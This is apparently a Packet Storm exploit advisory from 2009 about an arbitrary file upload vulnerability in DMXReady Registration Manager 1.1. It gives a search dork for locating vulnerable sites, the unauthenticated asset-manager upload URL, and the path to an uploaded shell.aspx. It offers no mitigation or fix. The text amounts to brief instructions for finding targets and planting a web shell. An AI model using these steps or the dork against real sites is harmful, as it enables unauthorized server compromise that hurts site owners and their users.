DMXReady Registration Manager 1.1 Shell Upload

2009-05-20T00:00:00
ID PACKETSTORM:77676
Type packetstorm
Reporter Securitylab Security Research
Modified 2009-05-20T00:00:00

Description

                                        
                                            `######################### Securitylab.ir ########################  
# Application Info:  
# Name: DMXReady Registration Manager  
# Version: 1.1  
# Website: http://www.dmxready.com  
#################################################################  
# Discoverd By: Securitylab.ir  
# Website: http://securitylab.ir  
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir  
#################################################################  
# Vulnerability Info:  
# Type: Arbitrary File Upload Vulnerability  
# Risk: High  
# Dork: "inc_webblogmanager.asp"  
#===========================================================  
# http://site.com/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp  
# select file and uploaded  
# view file : http://site.com/assets/webblogmanager/shell.aspx  
#===========================================================  
#################################################################  
# Securitylab Security Research Team  
###################################################################  
  
  
`